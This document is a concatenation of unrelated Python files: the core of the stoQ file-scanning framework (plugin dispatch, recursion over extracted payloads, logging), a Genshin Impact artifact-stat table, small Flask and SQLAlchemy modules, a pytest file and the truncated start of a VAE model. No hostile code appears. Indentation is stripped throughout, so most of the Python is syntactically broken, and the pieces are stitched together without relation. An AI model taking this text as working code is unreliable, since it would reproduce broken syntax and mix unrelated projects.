In order to help handle complex results and limit redundant processing of payloads when using
stoQ as a framework, a method exists that will allow for iterating over each result as if it
were the original root object. This is especially useful when handling compressed archives, such
as `zip` or `apk` files that may have multiple levels of archived content. Additionally, the
defined decorators will be run against each newly constructed `StoqResponse` and added to the
results.
>>> async for result in s.reconstruct_all_subresponses(results):
... print(result)
Below is a simple flow diagram of the iterated results when being reconstructed.
.. image:: /_static/reconstruct-results.png
.. _multiplugindir:
Multiple Plugin directories
===========================
When instantiating ``Stoq``, multiple plugins directories may be defined. For more
information on default paths, please refer to the :ref:`getting started documentation <stoqhome>`::
>>> from stoq import Stoq
>>> plugin_directories = ['/usr/local/stoq/plugins', '/home/.stoq/plugins']
>>> s = Stoq(plugin_dir_list=plugin_directories)
API
===
"""
import os
import asyncio
import logging
import configparser
from collections import defaultdict
from pythonjsonlogger import jsonlogger # type: ignore
from logging.handlers import RotatingFileHandler
from typing import (
AsyncGenerator,
Awaitable,
Coroutine,
DefaultDict,
Dict,
List,
Optional,
Set,
Tuple,
Union,
)
import stoq.helpers as helpers
from stoq.utils import ratelimited
from stoq.exceptions import StoqException
from stoq.plugin_manager import StoqPluginManager
from stoq.data_classes import (
ArchiverResponse,
DecoratorResponse,
DispatcherResponse,
Error,
ExtractedPayload,
Payload,
PayloadMeta,
PayloadResults,
Request,
RequestMeta,
StoqResponse,
WorkerResponse,
)
from stoq.plugins import (
ArchiverPlugin,
ConnectorPlugin,
DecoratorPlugin,
DispatcherPlugin,
WorkerPlugin,
)
# Created to enable `None` as a valid parameter
_UNSET = object()
class Stoq(StoqPluginManager):
def __init__(
self,
base_dir: Optional[str] = None,
config_file: Optional[str] = None,
log_dir: Optional[Union[str, object]] = _UNSET,
log_level: Optional[str] = None,
plugin_dir_list: Optional[List[str]] = None,
plugin_opts: Optional[Dict[str, Dict]] = None,
providers: Optional[List[str]] = None,
provider_consumers: Optional[int] = None,
source_archivers: Optional[List[str]] = None,
dest_archivers: Optional[List[str]] = None,
connectors: Optional[List[str]] = None,
dispatchers: Optional[List[str]] = None,
decorators: Optional[List[str]] = None,
always_dispatch: Optional[List[str]] = None,
max_queue: Optional[int] = None,
max_recursion: Optional[int] = None,
max_required_worker_depth: Optional[int] = None,
) -> None:
"""
Core Stoq Class
:param base_dir: Base directory for stoQ
:param config_file: stoQ Configuration file
:param log_dir: Path to log directory
:param log_level: Log level for logging events
:param plugin_dir_list: Paths to search for stoQ plugins
:param plugin_opts: Plugin specific options that are passed once a plugin is loaded
:param providers: Provider plugins to be loaded and run for sending payloads to scan
:param source_archivers: Archiver plugins to be used for loading payloads for analysis
:param dest_archivers: Archiver plugins to be used for archiving payloads and extracted payloads
:param connectors: Connectors to be loaded and run for saving results
:param dispatchers: Dispatcher plugins to be used
:param decorators: Decorators to be used
:param always_dispatch: Plugins to always send payloads to, no matter what
:param provider_consumers: Number of provider consumers to instantiate
:param max_queue: Max Queue size for Providers plugins
:param max_recursion: Maximum level of recursion into a payload and extracted payloads
:param max_required_worker_depth: Maximum depth for required worker plugins dependencies
"""
if not base_dir:
base_dir = os.getcwd()
base_dir = os.path.realpath(base_dir)
config_file = config_file or os.path.join(base_dir, 'stoq.cfg')
config = helpers.StoqConfigParser(allow_no_value=True)
if os.path.exists(config_file):
config.read(config_file)
self.max_queue = max_queue or config.getint('core', 'max_queue', fallback=100)
self.provider_consumers = provider_consumers or config.getint(
'core', 'provider_consumers', fallback=2
)
self.max_recursion = max_recursion or config.getint(
'core', 'max_recursion', fallback=10
)
self.max_required_worker_depth = max_required_worker_depth or config.getint(
'core', 'max_required_worker_depth', fallback=10
)
if log_dir is _UNSET:
log_dir = config.get(
'core', 'log_dir', fallback=os.path.join(base_dir, 'logs')
)
log_level = log_level or config.get('core', 'log_level', fallback='INFO')
log_maxbytes = int(config.get('core', 'log_maxbytes', fallback='1500000'))
log_backup_count = int(config.get('core', 'log_backup_count', fallback='5'))
log_syntax = config.get('core', 'log_syntax', fallback='text')
self._init_logger(
log_dir,
log_level, # type: ignore
log_maxbytes,
log_backup_count,
log_syntax,
)
plugin_dir_list = plugin_dir_list or config.getlist(
'core', 'plugin_dir_list', fallback=os.path.join(base_dir, 'plugins')
)
super().__init__(plugin_dir_list, plugin_opts, config)
providers = providers or config.getlist('core', 'providers', fallback=[])
self._loaded_provider_plugins = {
d: self.load_plugin(d) for d in providers if d # type: ignore
}
source_archivers = source_archivers or config.getlist(
'core', 'source_archivers', fallback=[]
)
self._loaded_source_archiver_plugins = {
d: self.load_plugin(d) for d in source_archivers if d # type: ignore
}
dest_archivers = dest_archivers or config.getlist(
'core', 'dest_archivers', fallback=[]
)
self._loaded_dest_archiver_plugins = {
d: self.load_plugin(d) for d in dest_archivers if d # type: ignore
}
connectors = connectors or config.getlist('core', 'connectors', fallback=[])
self._loaded_connector_plugins = [
self.load_plugin(d) for d in connectors if d # type: ignore
]
dispatchers = dispatchers or config.getlist('core', 'dispatchers', fallback=[])
self._loaded_dispatcher_plugins = {
d: self.load_plugin(d) for d in dispatchers if d # type: ignore
}
decorators = decorators or config.getlist('core', 'decorators', fallback=[])
self._loaded_decorator_plugins = {
d: self.load_plugin(d) for d in decorators if d # type: ignore
}
self.always_dispatch = always_dispatch or config.getlist(
'core', 'always_dispatch', fallback=[]
)
if self.always_dispatch:
for ad in self.always_dispatch:
self.load_plugin(ad)
@ratelimited()
async def scan(
self,
content: bytes,
payload_meta: Optional[PayloadMeta] = None,
request_meta: Optional[RequestMeta] = None,
add_start_dispatch: Optional[List[str]] = None,
ratelimit: Optional[str] = None,
) -> StoqResponse:
"""
Wrapper for `scan_request` that creates a `Payload` object from bytes
:param content: Raw bytes to be scanned
:param payload_meta: Metadata pertaining to originating source
:param request_meta: Metadata pertaining to the originating request
:param add_start_dispatch: Force first round of scanning to use specified plugins
:param ratelimit: Rate limit calls to scan
"""
self.log.debug(
f'Content received ({len(content)} bytes): '
f'PayloadMeta: {helpers.dumps(payload_meta, indent=0)}, '
f'RequestMeta: {helpers.dumps(request_meta, indent=0)}'
)
payload_meta = payload_meta or PayloadMeta()
payload = Payload(content, payload_meta)
request_meta = request_meta or RequestMeta()
request = Request(payloads=[payload], request_meta=request_meta)
return await self.scan_request(request, add_start_dispatch)
async def run(
self,
request_meta: Optional[RequestMeta] = None,
add_start_dispatch: Optional[List[str]] = None,
) -> None:
"""
Run stoQ using a provider plugin to scan multiple files until exhaustion
:param request_meta: Metadata pertaining to the originating request
:param add_start_dispatch: Force first round of scanning to use specified plugins
"""
# Don't initialize any (provider) plugins here! They should be
# initialized on stoq start-up or via load_plugin()
if not self._loaded_provider_plugins:
raise StoqException('No activated provider plugins')
self.log.debug(
f'Starting provider queue: RequestMeta: {request_meta}, '
f'start_dispatches: {add_start_dispatch}'
)
payload_queue: asyncio.Queue = asyncio.Queue(maxsize=self.max_queue)
providers = [
asyncio.ensure_future(plugin.ingest(payload_queue))
for name, plugin in self._loaded_provider_plugins.items()
]
workers = [
asyncio.ensure_future(
self._consume(payload_queue, request_meta, add_start_dispatch)
)
for n in range(self.provider_consumers)
]
try:
await asyncio.gather(*providers)
await payload_queue.join()
except KeyboardInterrupt:
pass
except Exception as e:
self.log.exception(e, exc_info=True)
finally:
for worker in workers:
worker.cancel()
self.log.debug('Cancelling provider worker')
async def scan_request(
self, request: Request, add_start_dispatch: Optional[List[str]] = None
) -> StoqResponse:
"""
Scan an individual payload
:param request: ``Request`` object of payload(s) to be scanned
:param add_start_dispatch: Force first round of scanning to use specified plugins
"""
self.log.debug(
f'Request received: RequestMeta: {helpers.dumps(request.request_meta, indent=0)}, '
f'start_dispatches: {helpers.dumps(add_start_dispatch, indent=0)}'
)
add_dispatches: Set[Tuple[Payload, str]] = set()
hashes_seen: DefaultDict[str, List] = defaultdict(list)
for idx, payload in enumerate(request.payloads):
if payload.results.payload_meta.should_scan and add_start_dispatch:
for plugin_name in add_start_dispatch:
add_dispatches.add((payload, plugin_name))
sha = helpers.get_sha256(payload.content)
hashes_seen[sha].append(idx)
for _recursion_level in range(1, self.max_recursion + 1):
self.log.debug(f'Beginning worker round {_recursion_level}')
scan_result = await self._execute_scan_round(request, add_dispatches)
if scan_result is None:
self.log.debug('No more plugins to run, completing scan')
break
extracted_payloads, add_dispatches = scan_result
# TODO: Add option for no-dedup
for extracted_payload in extracted_payloads:
payload_hash = helpers.get_sha256(extracted_payload.content)
if payload_hash not in hashes_seen:
self.log.debug(
f'Extracted payload {extracted_payload.results.payload_id} with '
f'PayloadMeta: {extracted_payload.results.payload_meta}'
)
request.payloads.append(extracted_payload)
hashes_seen[payload_hash].append(len(request.payloads) - 1)
payload_meta = extracted_payload.results.payload_meta
if _recursion_level >= self.max_recursion:
request.errors.append(
Error(
error=f'Final worker round ({_recursion_level}) reached, unable to process payload',
payload_id=extracted_payload.results.payload_id,
)
)
elif payload_meta.should_scan and payload_meta.dispatch_to:
add_dispatches.update(
(extracted_payload, add_dispatch)
for add_dispatch in payload_meta.dispatch_to
)
else:
payload_idx = hashes_seen[payload_hash]
for idx in payload_idx:
request.payloads[idx].results.extracted_by.extend(
extracted_payload.results.extracted_by
)
request.payloads[idx].results.extracted_from.extend(
extracted_payload.results.extracted_from
)
archive_tasks: List = []
if request.request_meta.archive_payloads:
for payload in request.payloads:
if not payload.results.payload_meta.should_archive:
continue
for archiver in self._loaded_dest_archiver_plugins.values():
archive_tasks.append(
self._apply_archiver(archiver, payload, request)
)
await asyncio.gather(*archive_tasks)
response = StoqResponse(request=request)
decorator_tasks = []
for decorator in self._loaded_decorator_plugins.values():
decorator_tasks.append(self._apply_decorator(decorator, response))
await asyncio.gather(*decorator_tasks)
connector_tasks = []
for connector in self._loaded_connector_plugins:
connector_tasks.append(self._apply_connector(connector, response))
await asyncio.gather(*connector_tasks)
return response
async def reconstruct_all_subresponses(
self, stoq_response: StoqResponse
) -> AsyncGenerator[StoqResponse, None]:
"""
Generate a new `StoqResponse` object for each `Payload` within
the `Request`
"""
for i, new_root_payload_result in enumerate(stoq_response.results):
parent_payload_ids = {stoq_response.results[i].payload_id}
# Construct a new root Payload object since StoqResponse only has the
# PayloadResults object
new_root_payload = Payload(b'')
new_root_payload.results = new_root_payload_result
relevant_payloads: List[Payload] = [new_root_payload]
for payload_result in stoq_response.results[i:]:
for extracted_from in payload_result.extracted_from:
if extracted_from in parent_payload_ids:
parent_payload_ids.add(payload_result.payload_id)
new_payload = Payload(b'')
new_payload.results = payload_result
relevant_payloads.append(new_payload)
new_request = Request(
payloads=relevant_payloads, request_meta=stoq_response.request_meta
)
new_response = StoqResponse(
request=new_request,
time=stoq_response.time,
scan_id=stoq_response.scan_id,
)
decorator_tasks = []
for plugin_name, decorator in self._loaded_decorator_plugins.items():
decorator_tasks.append(self._apply_decorator(decorator, new_response))
await asyncio.gather(*decorator_tasks)
yield new_response
async def _execute_scan_round(
self, request: Request, add_dispatches: Set[Tuple[Payload, str]]
) -> Optional[Tuple[List[Payload], Set[Tuple[Payload, str]]]]:
# Form total set of dispatches to run
total_dispatches: Set[Tuple[Payload, str]] = set(add_dispatches)
get_dispatches: List[Awaitable] = [
self._get_dispatches(payload, request)
for payload in request.payloads
if payload.results.payload_meta.should_scan
]
for future in asyncio.as_completed(get_dispatches):
payload, plugins = await future
for plugin in plugins:
total_dispatches.add((payload, plugin))
# Resolve plugin dependencies
can_run, deferred = self._resolve_dependencies(total_dispatches, request)
if not can_run: # Nothing left to do
return None
self.log.debug(
f'Starting scan of {len(can_run)} tasks,'
f' deferring {len(deferred)} to future rounds'
)
# Run plugins
nested_worker_results: List[ # type: ignore
Tuple[Set[Tuple[Payload, str]], List[Payload]]
] = await asyncio.gather(
*[
self._apply_worker(payload, plugin, request)
for payload, plugin in can_run
]
)
extracted_payloads = []
for additional_dispatches, extracted in nested_worker_results:
deferred.update(additional_dispatches)
extracted_payloads.extend(extracted)
return extracted_payloads, deferred
async def _get_dispatches(
self, payload: Payload, request: Request
) -> Tuple[Payload, Set[str]]:
# Run all dispatchers to form our initial set of worker plugins to run
worker_plugins: Set[str] = set(
self.always_dispatch
) if self.always_dispatch else set()
dispatch_results: List[Set[str]] = await asyncio.gather( # type: ignore
*[
self._apply_dispatcher(dispatcher, payload, request)
for dispatcher in self._loaded_dispatcher_plugins.values()
]
)
for dispatch_result in dispatch_results:
worker_plugins.update(dispatch_result)
return payload, worker_plugins
def _resolve_dependencies(
self, total_dispatches: Set[Tuple[Payload, str]], request: Request
) -> Tuple[Set[Tuple[Payload, WorkerPlugin]], Set[Tuple[Payload, str]]]:
# Resolve dependencies for each worker plugin that we want to run
total_can_run: Set[Tuple[Payload, WorkerPlugin]] = set()
total_deferred: Set[Tuple[Payload, str]] = set()
for payload, plugin in total_dispatches:
try:
can_run, deferred = self._resolve_plugin_dependencies(
payload, plugin, request, set()
)
except RuntimeError as e:
self.log.exception(e)
request.errors.append(
Error(
payload_id=payload.results.payload_id,
plugin_name=plugin,
error=helpers.format_exc(e),
)
)
continue
total_can_run.update(can_run)
total_deferred.update(deferred)
return total_can_run, total_deferred
def _resolve_plugin_dependencies(
self,
payload: Payload,
plugin_name: str,
request: Request,
init_plugin_dependency_chain: Set[str],
depth: int = 0,
) -> Tuple[Set[Tuple[Payload, WorkerPlugin]], Set[Tuple[Payload, str]]]:
if plugin_name in init_plugin_dependency_chain:
raise RecursionError(
'Circular required plugin dependency found, '
f'unable to process plugin {plugin_name}'
)
if depth > self.max_required_worker_depth:
raise RecursionError(
f'Max required plugin depth {self.max_required_worker_depth} reached, '
'unable to generate additional tasks'
)
try:
plugin: WorkerPlugin = self.load_plugin(plugin_name) # type: ignore
except Exception as e:
msg = f'Worker plugin {plugin_name} failed to load'
self.log.exception(msg)
request.errors.append(
Error(
payload_id=payload.results.payload_id,
plugin_name=plugin_name,
error=helpers.format_exc(e, msg=msg),
)
)
return set(), set()
if plugin_name in payload.results.plugins_run['workers']:
return set(), set()
can_run: Set[Tuple[Payload, WorkerPlugin]] = set()
deferred: Set[Tuple[Payload, str]] = set()
if self._plugin_can_run(payload, plugin):
can_run.add((payload, plugin))
else:
deferred.add((payload, plugin_name))
if len(plugin.required_workers) != 0:
self.log.debug(
f'{plugin_name} has dependencies of {", ".join(plugin.required_workers)}'
)
plugin_dependency_chain = init_plugin_dependency_chain.copy()
plugin_dependency_chain.add(plugin_name)
for required_plugin in plugin.required_workers:
(
required_plugin_can_run,
required_plugin_deferred,
) = self._resolve_plugin_dependencies(
payload,
required_plugin,
request,
plugin_dependency_chain,
depth + 1,
)
can_run.update(required_plugin_can_run)
deferred.update(required_plugin_deferred)
return can_run, deferred
async def _consume(
self,
payload_queue: asyncio.Queue,
request_meta: Optional[RequestMeta] = None,
add_start_dispatch: Optional[List[str]] = None,
) -> None:
while True:
try:
task = await payload_queue.get()
# Determine whether the provider has returned a `Payload`, or a task.
# If it is a task, load the defined archiver plugin to load the
# `Payload`, otherwise, simply continue on with the scanning.
if isinstance(task, Payload):
request = Request([task], request_meta)
await self.scan_request(request, add_start_dispatch)
else:
for source_archiver, task_meta in task.items():
self.log.debug(
f'Provider task received: source_archiver: {source_archiver}, '
f'task_meta: {task_meta}'
)
try:
ar = ArchiverResponse(task_meta)
payload = await self._loaded_source_archiver_plugins[
source_archiver
].get(ar)
if payload:
request = Request([payload], request_meta)
await self.scan_request(request, add_start_dispatch)
except Exception as e:
self.log.warn(
f'"{task_meta}" failed with archiver "{source_archiver}": {str(e)}'
)
payload_queue.task_done()
except asyncio.QueueEmpty:
pass
def _plugin_can_run(self, payload: Payload, worker_plugin: WorkerPlugin) -> bool:
for required_plugin_name in worker_plugin.required_workers:
if required_plugin_name not in payload.results.plugins_run['workers']:
return False
return True
async def _apply_worker(
self, payload: Payload, plugin: WorkerPlugin, request: Request
) -> Tuple[Set[Tuple[Payload, str]], List[Payload]]:
self.log.debug(
f'Scanning Payload {payload.results.payload_id} with WorkerPlugin {plugin.plugin_name}'
)
try:
worker_response: Optional[WorkerResponse] = await plugin.scan(
payload, request
)
except Exception as e:
worker_response = None
msg = 'worker:failed to scan'
self.log.exception(msg)
request.errors.append(
Error(
payload_id=payload.results.payload_id,
plugin_name=plugin.plugin_name,
error=helpers.format_exc(e, msg=msg),
)
)
payload.results.plugins_run['workers'].append(plugin.plugin_name)
if not worker_response:
return set(), []
if worker_response.results is not None:
payload.results.workers[plugin.plugin_name] = worker_response.results
request.errors.extend(worker_response.errors)
additional_dispatches: Set[Tuple[Payload, str]] = {
(payload, plugin_name) for plugin_name in worker_response.dispatch_to
}
extracted_payloads: List[Payload] = [
Payload(
content=extracted_payload.content,
payload_meta=extracted_payload.payload_meta,
extracted_by=plugin.plugin_name,
extracted_from=payload.results.payload_id,
)
for extracted_payload in worker_response.extracted
]
self.log.debug(
f'Completed scan of {payload.results.payload_id} with WorkerPlugin {plugin.plugin_name} '
f'{len(worker_response.results) if worker_response.results else 0} result keys, ' # type: ignore
f'{len(additional_dispatches)} additional dispatches, and '
f'{len(extracted_payloads)} extracted payloads'
)
return additional_dispatches, extracted_payloads
async def _apply_dispatcher(
self, dispatcher: DispatcherPlugin, payload: Payload, request: Request
) -> Set[str]:
self.log.debug(
f'Sending {payload.results.payload_id} to dispatcher ({dispatcher.plugin_name})'
)
plugin_names: Set[str] = set()
try:
dispatcher_result = await dispatcher.get_dispatches(payload, request)
except Exception as e:
msg = 'dispatcher:failed to dispatch'
self.log.exception(msg)
request.errors.append(
Error(
plugin_name=dispatcher.plugin_name,
error=helpers.format_exc(e, msg=msg),
payload_id=payload.results.payload_id,
)
)
return plugin_names
if dispatcher_result:
if dispatcher_result.plugin_names is not None:
plugin_names.update(dispatcher_result.plugin_names)
self.log.debug(
f'Dispatching {payload.results.payload_id} to {plugin_names}'
)
if dispatcher_result.meta is not None:
payload.dispatch_meta[dispatcher.plugin_name] = dispatcher_result.meta
return plugin_names
async def _apply_archiver(
self, archiver: ArchiverPlugin, payload: Payload, request: Request
) -> None:
archiver_response: Optional[ArchiverResponse] = None
self.log.debug(
f'Archiving {payload.results.payload_id} with {archiver.plugin_name}'
)
try:
archiver_response = await archiver.archive(payload, request)
except Exception as e:
msg = 'archiver:failed to archive'
self.log.exception(msg)
request.errors.append(
Error(
payload_id=payload.results.payload_id,
plugin_name=archiver.plugin_name,
error=helpers.format_exc(e, msg=msg),
)
)
payload.results.plugins_run['archivers'].append(archiver.plugin_name)
if archiver_response:
if archiver_response.errors is not None:
request.errors.extend(archiver_response.errors)
if archiver_response.results is not None:
payload.results.archivers[
archiver.plugin_name
] = archiver_response.results
async def _apply_decorator(
self, decorator: DecoratorPlugin, response: StoqResponse
) -> StoqResponse:
"""Mutates the given StoqResponse object to include decorator information"""
self.log.debug(f'Applying decorator {decorator.plugin_name}')
try:
decorator_response = await decorator.decorate(response)
except Exception as e:
msg = 'decorator'
self.log.exception(msg)
error = Error(
plugin_name=decorator.plugin_name, error=helpers.format_exc(e, msg=msg)
)
response.errors.append(error)
return response
if decorator_response is None:
return response
if decorator_response.results is not None:
response.decorators[decorator.plugin_name] = decorator_response.results
if decorator_response.errors:
response.errors.extend(decorator_response.errors)
return response
async def _apply_connector(
self, connector: ConnectorPlugin, response: StoqResponse
) -> None:
self.log.debug(f'Saving results to connector {connector.plugin_name}')
try:
await connector.save(response)
except Exception as e:
msg = f'Failed to save results using {connector.__module__}'
self.log.exception(msg)
error = Error(
plugin_name=connector.plugin_name, error=helpers.format_exc(e, msg=msg)
)
# record the failure on the response, mirroring _apply_decorator
response.errors.append(error)
def _init_logger(
self,
log_dir: Union[object, str],
log_level: str,
log_maxbytes: int,
log_backup_count: int,
log_syntax: str,
) -> None:
self.log = logging.getLogger('stoq')
self.log.setLevel(log_level.upper())
if log_syntax == 'json':
formatter = jsonlogger.JsonFormatter # type: ignore
else:
formatter = logging.Formatter
stderr_handler = logging.StreamHandler()
stderr_logformat = formatter(
'[%(asctime)s %(levelname)s] %(name)s: ' '%(message)s'
)
stderr_handler.setFormatter(stderr_logformat)
self.log.addHandler(stderr_handler)
if log_dir:
# Let's attempt to make the log directory if it doesn't exist
os.makedirs(log_dir, exist_ok=True) # type: ignore
log_path = os.path.abspath(
os.path.join(log_dir, 'stoq.log') # type: ignore
)
file_handler = RotatingFileHandler(
filename=log_path,
mode='a',
maxBytes=log_maxbytes,
backupCount=log_backup_count,
)
file_logformat = formatter(
'%(asctime)s %(levelname)s %(name)s:'
'%(filename)s:%(funcName)s:%(lineno)s: '
'%(message)s',
datefmt='%Y-%m-%d %H:%M:%S',
)
file_handler.setFormatter(file_logformat)
self.log.addHandler(file_handler)
self.log.debug(f'Writing logs to {log_path}')
|
# (c)2021 wolich
from utils.io import read_data_table
# For now, we simply put the artifact data into nested dictionaries.
# We avoid the complexity of an "artifact object".
def initialize_artifacts(unit='kaeya'):
if unit == 'albedo':
artifact_set_bonus = read_data_table('../data/artifacts_albedo.tsv')
# 5 star artifacts at level 20. Will need to modify flat HP and ATK for Defender's and Gambler.
artifact_main_stats = {
'ATK%/GEO/DEF%': {'ATK': 311, 'ATK%': 0.466, 'DEF%': 0.583, 'HP': 4780, 'GDB': 0.466, 'CR': 0, 'CD': 0},
'ATK%/GEO/CR': {'ATK': 311, 'ATK%': 0.466, 'DEF%': 0, 'HP': 4780, 'GDB': 0.466, 'CR': 0.311, 'CD': 0},
'ATK%/GEO/CD': {'ATK': 311, 'ATK%': 0.466, 'DEF%': 0, 'HP': 4780, 'GDB': 0.466, 'CR': 0, 'CD': 0.622},
'DEF%/GEO/DEF%': {'ATK': 311, 'ATK%': 0, 'DEF%': 1.166, 'HP': 4780, 'GDB': 0.466, 'CR': 0, 'CD': 0},
'DEF%/GEO/ATK%': {'ATK': 311, 'ATK%': 0.466, 'DEF%': 0.583, 'HP': 4780, 'GDB': 0.466, 'CR': 0, 'CD': 0},
'DEF%/GEO/CR': {'ATK': 311, 'ATK%': 0, 'DEF%': 0.583, 'HP': 4780, 'GDB': 0.466, 'CR': 0.311, 'CD': 0},
'DEF%/GEO/CD': {'ATK': 311, 'ATK%': 0, 'DEF%': 0.583, 'HP': 4780, 'GDB': 0.466, 'CR': 0, 'CD': 0.622},
'DEF%/ATK%/DEF%': {'ATK': 311, 'ATK%': 0.466, 'DEF%': 1.166, 'HP': 4780, 'GDB': 0, 'CR': 0, 'CD': 0},
'DEF%/ATK%/CR': {'ATK': 311, 'ATK%': 0.466, 'DEF%': 0.583, 'HP': 4780, 'GDB': 0, 'CR': 0.311, 'CD': 0},
'DEF%/ATK%/CD': {'ATK': 311, 'ATK%': 0.466, 'DEF%': 0.583, 'HP': 4780, 'GDB': 0, 'CR': 0, 'CD': 0.622},
'ATK%/DEF%/DEF%': {'ATK': 311, 'ATK%': 0.466, 'DEF%': 1.166, 'HP': 4780, 'GDB': 0, 'CR': 0, 'CD': 0},
'ATK%/DEF%/CR': {'ATK': 311, 'ATK%': 0.466, 'DEF%': 0.583, 'HP': 4780, 'GDB': 0, 'CR': 0.311, 'CD': 0},
'ATK%/DEF%/CD': {'ATK': 311, 'ATK%': 0.466, 'DEF%': 0.583, 'HP': 4780, 'GDB': 0, 'CR': 0, 'CD': 0.622},
'DEF%/DEF%/DEF%': {'ATK': 311, 'ATK%': 0, 'DEF%': 1.749, 'HP': 4780, 'GDB': 0, 'CR': 0, 'CD': 0},
'DEF%/DEF%/ATK%': {'ATK': 311, 'ATK%': 0.466, 'DEF%': 1.166, 'HP': 4780, 'GDB': 0, 'CR': 0, 'CD': 0},
'DEF%/DEF%/CR': {'ATK': 311, 'ATK%': 0, 'DEF%': 1.166, 'HP': 4780, 'GDB': 0, 'CR': 0.311, 'CD': 0},
'DEF%/DEF%/CD': {'ATK': 311, 'ATK%': 0, 'DEF%': 1.166, 'HP': 4780, 'GDB': 0, 'CR': 0, 'CD': 0.622},
}
# Default to Kaeya's artifacts.
else:
artifact_set_bonus = read_data_table('../data/artifacts_kaeya.tsv')
# 5 star artifacts at level 20.
artifact_main_stats = {
'ATK%/PHYS/ATK%': {'ATK': 311, 'ATK%': 0.932, 'HP': 4780, 'PDB': 0.583, 'CDB': 0, 'CR': 0, 'CD': 0},
'ATK%/PHYS/CR': {'ATK': 311, 'ATK%': 0.466, 'HP': 4780, 'PDB': 0.583, 'CDB': 0, 'CR': 0.311, 'CD': 0},
'ATK%/PHYS/CD': {'ATK': 311, 'ATK%': 0.466, 'HP': 4780, 'PDB': 0.583, 'CDB': 0, 'CR': 0, 'CD': 0.622},
'ATK%/CRYO/ATK%': {'ATK': 311, 'ATK%': 0.932, 'HP': 4780, 'PDB': 0, 'CDB': 0.466, 'CR': 0, 'CD': 0},
'ATK%/CRYO/CR': {'ATK': 311, 'ATK%': 0.466, 'HP': 4780, 'PDB': 0, 'CDB': 0.466, 'CR': 0.311, 'CD': 0},
'ATK%/CRYO/CD': {'ATK': 311, 'ATK%': 0.466, 'HP': 4780, 'PDB': 0, 'CDB': 0.466, 'CR': 0, 'CD': 0.622},
'ATK%/ATK%/ATK%': {'ATK': 311, 'ATK%': 1.398, 'HP': 4780, 'PDB': 0, 'CDB': 0, 'CR': 0, 'CD': 0},
'ATK%/ATK%/CR': {'ATK': 311, 'ATK%': 0.932, 'HP': 4780, 'PDB': 0, 'CDB': 0, 'CR': 0.311, 'CD': 0},
'ATK%/ATK%/CD': {'ATK': 311, 'ATK%': 0.932, 'HP': 4780, 'PDB': 0, 'CDB': 0, 'CR': 0, 'CD': 0.622},
}
return artifact_set_bonus, artifact_main_stats
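# Illustrative usage sketch: build the lookup tables defined above and print a few
# main-stat combinations. Assumes the ../data/*.tsv files referenced above are
# present so read_data_table can load the set-bonus table.
if __name__ == '__main__':
    set_bonus, main_stats = initialize_artifacts(unit='albedo')
    for build, stats in main_stats.items():
        print(build, stats['ATK%'], stats['CR'], stats['CD'])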
|
def echo(x):
return "echoing: %s" % x
|
from application import db
from sqlalchemy.sql import text
# Class table (Luokka)
class Luokka(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(20), nullable=False)
kilpailut = db.relationship("Kilpailu", backref='luokka', lazy=True)
def __init__(self,name):
self.name = name
def get_id(self):
return self.id
def get_name(self):
return self.name
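# Illustrative usage sketch (shown as comments): creating and reading back a row
# requires an active Flask application context for the app that `db` above is
# bound to, e.g.
#   luokka = Luokka("Open class")
#   db.session.add(luokka)
#   db.session.commit()
#   print(luokka.get_id(), luokka.get_name())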
|
import mol
import pytest
import numpy as np
@pytest.mark.parametrize("molecule, com, natom",
[("water", [9.81833333, 7.60366667, 12.673], 3), ("benzene", [-1.4045, 0, 0], 12)],)
def test_read_xyz(molecule, com, natom):
moldata = mol.data.get_molecule(molecule)
assert np.allclose(np.mean(moldata["geometry"], axis=0), com)
assert len(moldata["geometry"]) == natom
assert len(moldata["symbols"]) == natom
def test_get_molecule_missing():
with pytest.raises(FileNotFoundError):
        mol.data.get_molecule("non-existent")
|
from flask import render_template, request
from app import db
from app.errors import bp
from app.api.errors import error_response as api_error_response
def wants_json_response():
return request.accept_mimetypes['application/json'] >= \
request.accept_mimetypes['text/html']
@bp.app_errorhandler(404)
def not_found_error(error):
if wants_json_response():
return api_error_response(404)
return render_template('errors/404.html'), 404
@bp.app_errorhandler(500)
def internal_error(error):
db.session.rollback()
if wants_json_response():
return api_error_response(500)
return render_template('errors/500.html'), 500
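# Illustrative check of the negotiation in wants_json_response (as comments,
# since this module only imports inside the application package): with a JSON
# Accept header the JSON error body wins, e.g.
#   from flask import Flask
#   demo_app = Flask(__name__)  # throwaway app, only used to build a request context
#   with demo_app.test_request_context(headers={'Accept': 'application/json'}):
#       print(wants_json_response())  # True -> api_error_response(...) is returned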
|
#vaemodel
import copy
import torch
import torch.backends.cudnn as cudnn
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import torch.autograd as autograd
from torch.utils import data
from data_loader import DATA_LOADER as dataloader
import final_classifier as classifier
import models
class LINEAR_LOGSOFTMAX(nn.Module):
def __init__(self, input_dim, nclass):
super(LINEAR_LOGSOFTMAX, self).__init__()
self.fc = nn.Linear(input_dim,nclass)
self.logic = nn.LogSoftmax(dim=1)
self.lossfunction = nn.NLLLoss()
def forward(self, x):
o = self.logic(self.fc(x))
return o
class Model(nn.Module):
def __init__(self,hyperparameters):
super(Model,self).__init__()
self.device = hyperparameters['device']
self.auxiliary_data_source = hyperparameters['auxiliary_data_source']
self.all_data_sources = ['resnet_features',self.auxiliary_data_source]
self.DATASET = hyperparameters['dataset']
self.num_shots = hyperparameters['num_shots']
self.latent_size = hyperparameters['latent_size']
self.batch_size = hyperparameters['batch_size']
self.hidden_size_rule = hyperparameters['hidden_size_rule']
self.warmup = hyperparameters['model_specifics']['warmup']
self.generalized = hyperparameters['generalized']
self.classifier_batch_size = 32
self.img_seen_samples = hyperparameters['samples_per_class'][self.DATASET][0]
self.att_seen_samples = hyperparameters['samples_per_class'][self.DATASET][1]
self.att_unseen_samples = hyperparameters['samples_per_class'][self.DATASET][2]
self.img_unseen_samples = hyperparameters['samples_per_class'][self.DATASET][3]
self.reco_loss_function = hyperparameters['loss']
self.nepoch = hyperparameters['epochs']
self.lr_cls = hyperparameters['lr_cls']
self.cross_reconstruction = hyperparameters['model_specifics']['cross_reconstruction']
self.cls_train_epochs = hyperparameters['cls_train_steps']
self.dataset = dataloader( self.DATASET, copy.deepcopy(self.auxiliary_data_source) , device= self.device )
if self.DATASET=='CUB':
self.num_classes=200
self.num_novel_classes = 50
elif self.DATASET=='SUN':
self.num_classes=717
self.num_novel_classes = 72
elif self.DATASET=='AWA1' or self.DATASET=='AWA2':
self.num_classes=50
self.num_novel_classes = 10
feature_dimensions = [2048, self.dataset.aux_data.size(1)]
# Here, the encoders and decoders for all modalities are created and put into dict
self.encoder = {}
